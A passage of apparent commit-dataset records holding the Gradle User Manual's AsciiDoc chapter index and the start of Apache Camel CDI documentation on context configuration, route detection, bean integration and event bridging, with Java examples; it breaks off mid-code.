Management\n\ninclude::introduction_dependency_management.adoc[leveloffset=+2]\n\ninclude::dependency_management_terminology.adoc[leveloffset=+2]\n\ninclude::dependency_types.adoc[leveloffset=+2]\n\ninclude::repository_types.adoc[leveloffset=+2]\n\ninclude::declaring_dependencies.adoc[leveloffset=+2]\n\ninclude::declaring_repositories.adoc[leveloffset=+2]\n\ninclude::inspecting_dependencies.adoc[leveloffset=+2]\n\ninclude::managing_dependency_configurations.adoc[leveloffset=+2]\n\ninclude::managing_transitive_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_locking.adoc[leveloffset=+2]\n\ninclude::troubleshooting_dependency_resolution.adoc[leveloffset=+2]\n\ninclude::customizing_dependency_resolution_behavior.adoc[leveloffset=+2]\n\ninclude::dependency_cache.adoc[leveloffset=+2]\n\ninclude::working_with_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_management_attribute_based_matching.adoc[leveloffset=+2]\n\n[[part:publishing]]\n== Publishing Artifacts\n\ninclude::publishing_overview.adoc[leveloffset=+2]\n\ninclude::artifact_management.adoc[leveloffset=+2]\n\n[[part:jvm_projects]]\n== Java & Other JVM Projects\n\ninclude::building_java_projects.adoc[leveloffset=+2]\n\ninclude::java_testing.adoc[leveloffset=+2]\n\ninclude::dependency_management_for_java_projects.adoc[leveloffset=+2]\n\n[[part:native_projects]]\n== Native Projects\n\ninclude::native_software.adoc[leveloffset=+2]\n\ninclude::software_model_concepts.adoc[leveloffset=+2]\n\ninclude::software_model.adoc[leveloffset=+2]\n\ninclude::rule_source.adoc[leveloffset=+2]\n\ninclude::software_model_extend.adoc[leveloffset=+2]\n\n[[part:extending_gradle]]\n== Extending Gradle\n\ninclude::custom_plugins.adoc[leveloffset=+2]\n\ninclude::java_gradle_plugin.adoc[leveloffset=+2]\n\ninclude::embedding.adoc[leveloffset=+2]\n\n[[part:reference]]\n== Reference\n\ninclude::groovy_build_script_primer.adoc[leveloffset=+2]\n\ninclude::kotlin_dsl.adoc[leveloffset=+2]\n\ninclude::plugin_reference.adoc[leveloffset=2]\n\ninclude::command_line_interface.adoc[leveloffset=+2]\n\ninclude::third_party_integration.adoc[leveloffset=2]\n\ninclude::gradle_wrapper.adoc[leveloffset=+2]\n\ninclude::directory_layout.adoc[leveloffset=+2]\n\n[[part:plugins]]\n== Plugins\n\ninclude::antlr_plugin.adoc[leveloffset=+2]\n\ninclude::application_plugin.adoc[leveloffset=+2]\n\ninclude::base_plugin.adoc[leveloffset=+2]\n\ninclude::build_init_plugin.adoc[leveloffset=+2]\n\ninclude::checkstyle_plugin.adoc[leveloffset=+2]\n\ninclude::codenarc_plugin.adoc[leveloffset=+2]\n\ninclude::distribution_plugin.adoc[leveloffset=+2]\n\ninclude::ear_plugin.adoc[leveloffset=+2]\n\ninclude::eclipse_plugin.adoc[leveloffset=+2]\n\ninclude::findbugs_plugin.adoc[leveloffset=+2]\n\ninclude::groovy_plugin.adoc[leveloffset=+2]\n\ninclude::idea_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_ivy.adoc[leveloffset=+2]\n\ninclude::jacoco_plugin.adoc[leveloffset=+2]\n\ninclude::java_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_distribution_plugin.adoc[leveloffset=+2]\n\ninclude::java_platform_plugin.adoc[leveloffset=+2]\n\ninclude::jdepend_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_maven.adoc[leveloffset=+2]\n\ninclude::maven_plugin.adoc[leveloffset=+2]\n\ninclude::osgi_plugin.adoc[leveloffset=+2]\n\ninclude::play_plugin.adoc[leveloffset=+2]\n\ninclude::pmd_plugin.adoc[leveloffset=+2]\n\ninclude::scala_plugin.adoc[leveloffset=+2]\n\ninclude::signing_plugin.adoc[leveloffset=+2]\n\ninclude::war_plugin.adoc[leveloffset=+2]\n\n== License Information\n\ninclude::licenses.adoc[leveloffset=+1]\n","old_contents":"\/\/ Copyright 2018 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n= Gradle User Manual: Version {gradleVersion}\n:description: Single-page Gradle User Manual for Gradle {gradleVersion}\n:meta-name-robots: noindex\n:meta-name-twitter_card: summary\n:meta-name-twitter_site: @gradle\n:meta-name-twitter_creator: @gradle\n:meta-name-twitter_title: {doctitle}\n:meta-name-twitter_description: {description}\n:meta-name-twitter_url: {docsUrl}\/{gradleVersion}\/userguide\/{docname}.html\n:meta-name-twitter_image: {website}\/images\/gradle-256x256.png\n\ntoc::[]\n\n[[part:about_gradle]]\n== About Gradle\n\ninclude::overview.adoc[leveloffset=+2]\n\ninclude::what_is_gradle.adoc[leveloffset=+2]\n\n[[part:getting_started]]\n== Getting Started\n\ninclude::getting_started.adoc[leveloffset=2]\n\ninclude::installation.adoc[leveloffset=+2]\n\ninclude::troubleshooting.adoc[leveloffset=+2]\n\n[[part:upgrading_and_migrating]]\n== Upgrading and Migrating\n\ninclude::upgrading_version_5.adoc[leveloffset=+2]\ninclude::upgrading_version_4.adoc[leveloffset=+2]\n\ninclude::migrating_from_ant.adoc[leveloffset=+2]\n\n[[part:running_builds]]\n== Running Gradle Builds\n\ninclude::build_environment.adoc[leveloffset=+2]\n\ninclude::gradle_daemon.adoc[leveloffset=+2]\n\ninclude::init_scripts.adoc[leveloffset=+2]\n\ninclude::intro_multi_project_builds.adoc[leveloffset=+2]\n\ninclude::build_cache.adoc[leveloffset=+2]\n\ninclude::composite_builds.adoc[leveloffset=+2]\n\n[[part:authoring_builds]]\n== Authoring Gradle Builds\n\ninclude::tutorial_using_tasks.adoc[leveloffset=+2]\n\ninclude::more_about_tasks.adoc[leveloffset=+2]\n\ninclude::writing_build_scripts.adoc[leveloffset=+2]\n\ninclude::working_with_files.adoc[leveloffset=+2]\n\ninclude::custom_tasks.adoc[leveloffset=+2]\n\ninclude::plugins.adoc[leveloffset=+2]\n\ninclude::build_lifecycle.adoc[leveloffset=+2]\n\ninclude::logging.adoc[leveloffset=+2]\n\ninclude::multi_project_builds.adoc[leveloffset=+2]\n\ninclude::organizing_gradle_projects.adoc[leveloffset=+2]\n\ninclude::authoring_maintainable_build_scripts.adoc[leveloffset=+2]\n\ninclude::lazy_configuration.adoc[leveloffset=+2]\n\ninclude::test_kit.adoc[leveloffset=+2]\n\ninclude::ant.adoc[leveloffset=+2]\n\n[[part:dependency_management]]\n== Dependency Management\n\ninclude::introduction_dependency_management.adoc[leveloffset=+2]\n\ninclude::dependency_management_terminology.adoc[leveloffset=+2]\n\ninclude::dependency_types.adoc[leveloffset=+2]\n\ninclude::repository_types.adoc[leveloffset=+2]\n\ninclude::declaring_dependencies.adoc[leveloffset=+2]\n\ninclude::declaring_repositories.adoc[leveloffset=+2]\n\ninclude::inspecting_dependencies.adoc[leveloffset=+2]\n\ninclude::managing_dependency_configurations.adoc[leveloffset=+2]\n\ninclude::managing_transitive_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_locking.adoc[leveloffset=+2]\n\ninclude::troubleshooting_dependency_resolution.adoc[leveloffset=+2]\n\ninclude::customizing_dependency_resolution_behavior.adoc[leveloffset=+2]\n\ninclude::dependency_cache.adoc[leveloffset=+2]\n\ninclude::working_with_dependencies.adoc[leveloffset=+2]\n\ninclude::dependency_management_attribute_based_matching.adoc[leveloffset=+2]\n\n[[part:publishing]]\n== Publishing Artifacts\n\ninclude::publishing_overview.adoc[leveloffset=+2]\n\ninclude::artifact_management.adoc[leveloffset=+2]\n\n[[part:jvm_projects]]\n== Java & Other JVM Projects\n\ninclude::building_java_projects.adoc[leveloffset=+2]\n\ninclude::java_testing.adoc[leveloffset=+2]\n\ninclude::dependency_management_for_java_projects.adoc[leveloffset=+2]\n\n[[part:native_projects]]\n== Native Projects\n\ninclude::native_software.adoc[leveloffset=+2]\n\ninclude::software_model_concepts.adoc[leveloffset=+2]\n\ninclude::software_model.adoc[leveloffset=+2]\n\ninclude::rule_source.adoc[leveloffset=+2]\n\ninclude::software_model_extend.adoc[leveloffset=+2]\n\n[[part:extending_gradle]]\n== Extending Gradle\n\ninclude::custom_plugins.adoc[leveloffset=+2]\n\ninclude::java_gradle_plugin.adoc[leveloffset=+2]\n\ninclude::embedding.adoc[leveloffset=+2]\n\n[[part:reference]]\n== Reference\n\ninclude::groovy_build_script_primer.adoc[leveloffset=+2]\n\ninclude::kotlin_dsl.adoc[leveloffset=+2]\n\ninclude::plugin_reference.adoc[leveloffset=2]\n\ninclude::command_line_interface.adoc[leveloffset=+2]\n\ninclude::third_party_integration.adoc[leveloffset=2]\n\ninclude::gradle_wrapper.adoc[leveloffset=+2]\n\ninclude::directory_layout.adoc[leveloffset=+2]\n\n[[part:plugins]]\n== Plugins\n\ninclude::antlr_plugin.adoc[leveloffset=+2]\n\ninclude::application_plugin.adoc[leveloffset=+2]\n\ninclude::base_plugin.adoc[leveloffset=+2]\n\ninclude::build_init_plugin.adoc[leveloffset=+2]\n\ninclude::checkstyle_plugin.adoc[leveloffset=+2]\n\ninclude::codenarc_plugin.adoc[leveloffset=+2]\n\ninclude::distribution_plugin.adoc[leveloffset=+2]\n\ninclude::ear_plugin.adoc[leveloffset=+2]\n\ninclude::eclipse_plugin.adoc[leveloffset=+2]\n\ninclude::findbugs_plugin.adoc[leveloffset=+2]\n\ninclude::groovy_plugin.adoc[leveloffset=+2]\n\ninclude::idea_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_ivy.adoc[leveloffset=+2]\n\ninclude::jacoco_plugin.adoc[leveloffset=+2]\n\ninclude::java_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_plugin.adoc[leveloffset=+2]\n\ninclude::java_library_distribution_plugin.adoc[leveloffset=+2]\n\ninclude::jdepend_plugin.adoc[leveloffset=+2]\n\ninclude::publishing_maven.adoc[leveloffset=+2]\n\ninclude::maven_plugin.adoc[leveloffset=+2]\n\ninclude::osgi_plugin.adoc[leveloffset=+2]\n\ninclude::play_plugin.adoc[leveloffset=+2]\n\ninclude::pmd_plugin.adoc[leveloffset=+2]\n\ninclude::scala_plugin.adoc[leveloffset=+2]\n\ninclude::signing_plugin.adoc[leveloffset=+2]\n\ninclude::war_plugin.adoc[leveloffset=+2]\n\n== License Information\n\ninclude::licenses.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd84f3857d87b26543989bede3d953dadbd48cf6","subject":"Camel CDI: update testing container versions in documentation","message":"Camel CDI: update testing container versions in documentation\n","repos":"isavin\/camel,Thopap\/camel,tadayosi\/camel,gautric\/camel,rmarting\/camel,curso007\/camel,akhettar\/camel,ullgren\/camel,anton-k11\/camel,gautric\/camel,tadayosi\/camel,mgyongyosi\/camel,acartapanis\/camel,gautric\/camel,pax95\/camel,prashant2402\/camel,dmvolod\/camel,zregvart\/camel,Fabryprog\/camel,anoordover\/camel,pmoerenhout\/camel,nboukhed\/camel,apache\/camel,prashant2402\/camel,anton-k11\/camel,pmoerenhout\/camel,mgyongyosi\/camel,nboukhed\/camel,mgyongyosi\/camel,Thopap\/camel,kevinearls\/camel,dmvolod\/camel,tlehoux\/camel,nboukhed\/camel,rmarting\/camel,cunningt\/camel,prashant2402\/camel,dmvolod\/camel,tdiesler\/camel,pax95\/camel,DariusX\/camel,pkletsko\/camel,christophd\/camel,onders86\/camel,DariusX\/camel,CodeSmell\/camel,CodeSmell\/camel,anoordover\/camel,onders86\/camel,scranton\/camel,scranton\/camel,pmoerenhout\/camel,kevinearls\/camel,ullgren\/camel,isavin\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,prashant2402\/camel,DariusX\/camel,tlehoux\/camel,Fabryprog\/camel,scranton\/camel,snurmine\/camel,acartapanis\/camel,acartapanis\/camel,pax95\/camel,dmvolod\/camel,alvinkwekel\/camel,jonmcewen\/camel,adessaigne\/camel,ullgren\/camel,rmarting\/camel,prashant2402\/camel,cunningt\/camel,prashant2402\/camel,adessaigne\/camel,curso007\/camel,nikhilvibhav\/camel,scranton\/camel,christophd\/camel,kevinearls\/camel,zregvart\/camel,anton-k11\/camel,curso007\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,sverkera\/camel,nboukhed\/camel,isavin\/camel,kevinearls\/camel,cunningt\/camel,drsquidop\/camel,tadayosi\/camel,DariusX\/camel,Thopap\/camel,apache\/camel,tdiesler\/camel,pkletsko\/camel,objectiser\/camel,yuruki\/camel,pkletsko\/camel,nicolaferraro\/camel,objectiser\/camel,akhettar\/camel,rmarting\/camel,isavin\/camel,jonmcewen\/camel,acartapanis\/camel,zregvart\/camel,alvinkwekel\/camel,akhettar\/camel,yuruki\/camel,davidkarlsen\/camel,anoordover\/camel,apache\/camel,punkhorn\/camel-upstream,sverkera\/camel,akhettar\/camel,tadayosi\/camel,cunningt\/camel,sverkera\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,curso007\/camel,kevinearls\/camel,onders86\/camel,yuruki\/camel,punkhorn\/camel-upstream,pax95\/camel,anton-k11\/camel,zregvart\/camel,tdiesler\/camel,drsquidop\/camel,mcollovati\/camel,pkletsko\/camel,christophd\/camel,snurmine\/camel,yuruki\/camel,drsquidop\/camel,pmoerenhout\/camel,davidkarlsen\/camel,Thopap\/camel,yuruki\/camel,apache\/camel,sverkera\/camel,nicolaferraro\/camel,anton-k11\/camel,mgyongyosi\/camel,akhettar\/camel,gautric\/camel,jamesnetherton\/camel,anoordover\/camel,onders86\/camel,nikhilvibhav\/camel,nboukhed\/camel,tlehoux\/camel,isavin\/camel,dmvolod\/camel,objectiser\/camel,pkletsko\/camel,tlehoux\/camel,adessaigne\/camel,scranton\/camel,salikjan\/camel,jamesnetherton\/camel,scranton\/camel,davidkarlsen\/camel,jamesnetherton\/camel,christophd\/camel,apache\/camel,mcollovati\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,anoordover\/camel,pmoerenhout\/camel,isavin\/camel,salikjan\/camel,christophd\/camel,acartapanis\/camel,gnodet\/camel,ullgren\/camel,nikhilvibhav\/camel,sverkera\/camel,apache\/camel,punkhorn\/camel-upstream,pax95\/camel,davidkarlsen\/camel,nboukhed\/camel,jamesnetherton\/camel,curso007\/camel,Thopap\/camel,dmvolod\/camel,sverkera\/camel,Fabryprog\/camel,mgyongyosi\/camel,mcollovati\/camel,CodeSmell\/camel,Fabryprog\/camel,akhettar\/camel,nicolaferraro\/camel,snurmine\/camel,mgyongyosi\/camel,gautric\/camel,nicolaferraro\/camel,jonmcewen\/camel,drsquidop\/camel,kevinearls\/camel,tadayosi\/camel,drsquidop\/camel,snurmine\/camel,snurmine\/camel,rmarting\/camel,jamesnetherton\/camel,pkletsko\/camel,gnodet\/camel,alvinkwekel\/camel,tlehoux\/camel,yuruki\/camel,pax95\/camel,gautric\/camel,jonmcewen\/camel,tadayosi\/camel,objectiser\/camel,snurmine\/camel,curso007\/camel,anoordover\/camel,christophd\/camel,Thopap\/camel,rmarting\/camel,acartapanis\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,onders86\/camel,tlehoux\/camel,onders86\/camel,cunningt\/camel,tdiesler\/camel,anton-k11\/camel,jonmcewen\/camel,drsquidop\/camel,gnodet\/camel","old_file":"components\/camel-cdi\/src\/main\/docs\/cdi.adoc","new_file":"components\/camel-cdi\/src\/main\/docs\/cdi.adoc","new_contents":"## Camel CDI\n\nThe Camel CDI component provides auto-configuration for Apache Camel\nusing CDI as dependency injection framework based\non\u00a0_convention-over-configuration_. It auto-detects Camel routes\navailable in the application and provides beans for common Camel\nprimitives like `Endpoint`,\u00a0`FluentProducerTemplate`, `ProducerTemplate` or\u00a0`TypeConverter`. It\nimplements standard link:bean-integration.html[Camel bean integration]\nso that Camel annotations like\u00a0`@Consume`,\u00a0`@Produce`\nand\u00a0`@PropertyInject` can be used seamlessly in CDI beans. Besides, it\nbridges Camel events (e.g. `RouteAddedEvent`,\n`CamelContextStartedEvent`,\u00a0`ExchangeCompletedEvent`, ...) as CDI events\nand provides a CDI events endpoint that can be used to consume \/ produce\nCDI events from \/ to Camel routes.\n\nNOTE: While the Camel CDI component is available as of **Camel 2.10**, it's\nbeen rewritten in *Camel 2.17* to better fit into the CDI programming\nmodel. Hence some of the features like the Camel events to CDI events\nbridge and the CDI events endpoint only apply starting Camel 2.17.\n\nNOTE: More details on how to test Camel CDI applications are available in\nlink:cdi-testing.html[Camel CDI testing].\n\n### Auto-configured Camel context\n\nCamel CDI automatically deploys and configures a\u00a0`CamelContext` bean.\nThat `CamelContext` bean is automatically instantiated, configured and\nstarted (resp. stopped) when the CDI container initializes (resp. shuts\ndown). It can be injected in the application, e.g.:\n\n[source,java]\n----\n@Inject\nCamelContext context;\n----\n\nThat default `CamelContext` bean is qualified with the\nbuilt-in\u00a0`@Default` qualifier, is scoped\u00a0`@ApplicationScoped` and is of\ntype `DefaultCamelContext`.\n\nNote that this bean can be customized programmatically and other Camel\ncontext beans can be deployed in the application as well.\n\n### Auto-detecting Camel routes\n\nCamel CDI automatically\u00a0collects all the\u00a0`RoutesBuilder` beans in the\napplication, instantiates and add them to the `CamelContext` bean\ninstance when the CDI container initializes. For example, adding a Camel\nroute is as simple as declaring a class, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nNote that you can declare as many\u00a0`RoutesBuilder` beans as you want.\nBesides,\u00a0`RouteContainer` beans are also automatically collected,\ninstantiated and added to the\u00a0`CamelContext` bean instance managed by\nCamel CDI when the container initializes.\n\n*Available as of Camel 2.19*\n\nIn some situations, it may be necessary to disable the auto-configuration of the `RouteBuilder` and `RouteContainer` beans. That can be achieved by observing for the `CdiCamelConfiguration` event, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoConfigureRoutes(false);\n}\n----\n\nSimilarly, it is possible to deactivate the automatic starting of the configured `CamelContext` beans, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoStartContexts(false);\n}\n----\n\n### Auto-configured Camel primitives\n\nCamel CDI provides beans for common Camel primitives that can be\ninjected in any CDI beans, e.g.:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n\n@Inject\nTypeConverter converter;\n----\n\n### Camel context configuration\n\nIf you just want to change the name of the default `CamelContext` bean,\nyou can used the `@ContextName` qualifier\u00a0provided by Camel CDI, e.g.:\n\n[source,java]\n----\n@ContextName(\"camel-context\")\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nElse, if more customization is needed, any\u00a0`CamelContext`\u00a0class can be\nused to declare a custom Camel context bean. Then,\nthe\u00a0`@PostConstruct`\u00a0and\u00a0`@PreDestroy`\u00a0lifecycle callbacks can be done\nto do the customization, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass CustomCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void customize() {\n \/\/ Set the Camel context name\n setName(\"custom\");\n \/\/ Disable JMX\n disableJMX();\n }\n\n @PreDestroy\n void cleanUp() {\n \/\/ ...\n }\n}\n----\n\nlink:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_method[Producer]\nand\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#disposer_method[disposer]\nmethods can also be used as well to customize the Camel context bean, e.g.:\n\n[source,java]\n----\nclass CamelContextFactory {\n\n @Produces\n @ApplicationScoped\n CamelContext customize() {\n DefaultCamelContext context = new DefaultCamelContext();\n context.setName(\"custom\");\n return context;\n }\n\n void cleanUp(@Disposes CamelContext context) {\n \/\/ ...\n }\n}\n----\n\nSimilarly,\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_field[producer\nfields]\u00a0can be used, e.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\nCamelContext context = new CustomCamelContext();\n\nclass CustomCamelContext extends DefaultCamelContext {\n\n CustomCamelContext() {\n setName(\"custom\");\n }\n}\n----\n\nThis pattern can be used for example to avoid having the Camel context\nroutes started automatically when the container initializes by calling\nthe\u00a0`setAutoStartup`\u00a0method, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass ManualStartupCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void manual() {\n setAutoStartup(false);\n }\n}\n----\n\n### Multiple Camel contexts\n\nAny number of `CamelContext` beans can actually be declared in the\napplication as documented above. In that case, the CDI qualifiers\ndeclared on these `CamelContext` beans are used to bind the Camel routes\nand other Camel primitives to the corresponding Camel contexts. From\nexample, if the following beans get declared:\n\n[source,java]\n----\n@ApplicationScoped\n@ContextName(\"foo\")\nclass FooCamelContext extends DefaultCamelContext {\n}\n\n@ApplicationScoped\n@BarContextQualifier\nclass BarCamelContext extends DefaultCamelContext {\n}\n\u00a0\n@ContextName(\"foo\")\nclass RouteAddedToFooCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@BarContextQualifier\nclass RouteAddedToBarCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@ContextName(\"baz\")\nclass RouteAddedToBazCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@MyOtherQualifier\nclass RouteNotAddedToAnyCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n----\n\nThe\u00a0`RoutesBuilder` beans qualified with\u00a0`@ContextName` are\nautomatically added to the corresponding `CamelContext` beans by Camel\nCDI. If no such `CamelContext` bean exists, it gets automatically\ncreated, as for the `RouteAddedToBazCamelContext` bean. Note this only\nhappens for the\u00a0`@ContextName`\u00a0qualifier provided by Camel CDI. Hence\nthe\u00a0`RouteNotAddedToAnyCamelContext` bean qualified with the\nuser-defined\u00a0`@MyOtherQualifier`\u00a0qualifier does not get added to any\nCamel contexts. That may be useful, for example, for Camel routes that\nmay be required to be added later during the application execution.\n\nNOTE: Since Camel version 2.17.0, Camel CDI is capable of managing any kind of\n`CamelContext` beans (e.g. `DefaultCamelContext`). In previous versions,\nit is only capable of managing beans of type `CdiCamelContext` so it is\nrequired to extend it.\n\nThe CDI qualifiers declared on the\u00a0`CamelContext`\u00a0beans are also used to\nbind the corresponding Camel primitives, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\n@BarContextQualifier\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@ContextName(\"baz\")\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n### Configuration properties\n\nTo configure the sourcing of the configuration properties used by Camel\nto resolve properties placeholders, you can declare\na\u00a0`PropertiesComponent`\u00a0bean qualified with `@Named(\"properties\")`,\ne.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent propertiesComponent() {\n Properties properties = new Properties();\n properties.put(\"property\", \"value\");\n PropertiesComponent component = new PropertiesComponent();\n component.setInitialProperties(properties);\n component.setLocation(\"classpath:placeholder.properties\");\n return component;\n}\n----\n\nIf you want to\nuse\u00a0link:http:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]\u00a0you can declare the\nfollowing\u00a0`PropertiesComponent` bean:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent properties(PropertiesParser parser) {\n PropertiesComponent component = new PropertiesComponent();\n component.setPropertiesParser(parser);\n return component;\n}\n\n\/\/ PropertiesParser bean that uses DeltaSpike to resolve properties\nstatic class DeltaSpikeParser extends DefaultPropertiesParser {\n @Override\n public String parseProperty(String key, String value, Properties properties) {\n return ConfigResolver.getPropertyValue(key);\n }\n}\n----\n\nYou can see the\u00a0`camel-example-cdi-properties` example for a working\nexample of a Camel CDI application using DeltaSpike configuration\nmechanism.\n\n### Auto-configured type converters\n\nCDI beans annotated with the\u00a0`@Converter`\u00a0annotation are automatically\nregistered into the deployed Camel contexts, e.g.:\n\n[source,java]\n----\n@Converter\npublic class MyTypeConverter {\n\n @Converter\n public Output convert(Input input) {\n \/\/...\n }\n}\n----\n\nNote that CDI injection is supported within the type converters.\n\n### Camel bean integration\n\n#### Camel annotations\n\nAs part of the Camel\u00a0link:http:\/\/camel.apache.org\/bean-integration.html[bean\nintegration],\u00a0Camel comes with a set\nof\u00a0link:http:\/\/camel.apache.org\/bean-integration.html#BeanIntegration-Annotations[annotations]\u00a0that\nare seamlessly supported by Camel CDI. So you can use any of these\nannotations in your CDI beans, e.g.:\n\n[width=\"100%\",cols=\"1,2a,2a\",options=\"header\",]\n|=======================================================================\n|\u00a0 |Camel annotation |CDI equivalent\n|Configuration property a|\n[source,java]\n----\n@PropertyInject(\"key\")\nString value;\n----\n\n a|\nIf using\nhttp:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]:\n\n[source,java]\n----\n@Inject\n@ConfigProperty(name = \"key\")\nString value;\n----\n\nSee link:cdi.html[configuration properties] for more details.\n\n|Producer template injection (default Camel context) a|\n[source,java]\n----\n@Produce(uri = \"mock:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"mock:outbound\")\nFluentProducerTemplate producer;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"direct:outbound\")\nFluentProducerTemplate producer;\n----\n\n|Endpoint injection (default Camel context) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\")\nEndpoint endpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n|Endpoint injection (Camel context by name) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\",\n context = \"foo\")\nEndpoint contextEndpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nEndpoint contextEndpoint;\n----\n\n|Bean injection (by type) a|\n[source,java]\n----\n@BeanInject\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\nMyBean bean;\n----\n\n|Bean injection (by name) a|\n[source,java]\n----\n@BeanInject(\"foo\")\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Named(\"foo\")\nMyBean bean;\n----\n\n|POJO consuming a|\n[source,java]\n----\n@Consume(uri = \"seda:inbound\")\nvoid consume(@Body String body) {\n \/\/...\n}\n----\n\n |\u00a0\n|=======================================================================\n\n#### Bean component\n\nYou can refer to CDI beans, either by type or name, From the Camel DSL,\ne.g. with the Java Camel DSL:\n\n[source,java]\n----\nclass MyBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(MyBean.class);\n----\n\nOr to lookup a CDI bean by name from the Java DSL:\n\n[source,java]\n----\n@Named(\"foo\")\nclass MyNamedBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(\"foo\");\n----\n\n#### Referring beans from Endpoint URIs\n\nWhen configuring endpoints using the URI syntax you can refer to beans\nin the\u00a0link:registry.html[Registry]\u00a0using the `#` notation.\u00a0If the URI\nparameter value starts with a\u00a0`#`\u00a0sign then Camel CDI will lookup\u00a0for a\nbean of the given type by name, e.g.:\n\n[source,java]\n----\nfrom(\"jms:queue:{{destination}}?transacted=true&transactionManager=#jtaTransactionManager\").to(\"...\");\n----\n\nHaving the following CDI bean qualified\nwith\u00a0`@Named(\"jtaTransactionManager\")`:\n\n[source,java]\n----\n@Produces\n@Named(\"jtaTransactionManager\")\nPlatformTransactionManager createTransactionManager(TransactionManager transactionManager, UserTransaction userTransaction) {\n JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();\n jtaTransactionManager.setUserTransaction(userTransaction);\n jtaTransactionManager.setTransactionManager(transactionManager);\n jtaTransactionManager.afterPropertiesSet();\n return jtaTransactionManager;\n}\n----\n\n### Camel events to CDI events\n\n*Available as of Camel 2.17*\n\nCamel provides a set\nof\u00a0link:http:\/\/camel.apache.org\/maven\/current\/camel-core\/apidocs\/org\/apache\/camel\/management\/event\/package-summary.html[management\nevents]\u00a0that can be subscribed to for listening to Camel context,\nservice, route and exchange events. Camel CDI seamlessly translates\nthese Camel events into CDI events that can be observed using\nCDI\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethods], e.g.:\n\n[source,java]\n----\nvoid onContextStarting(@Observes 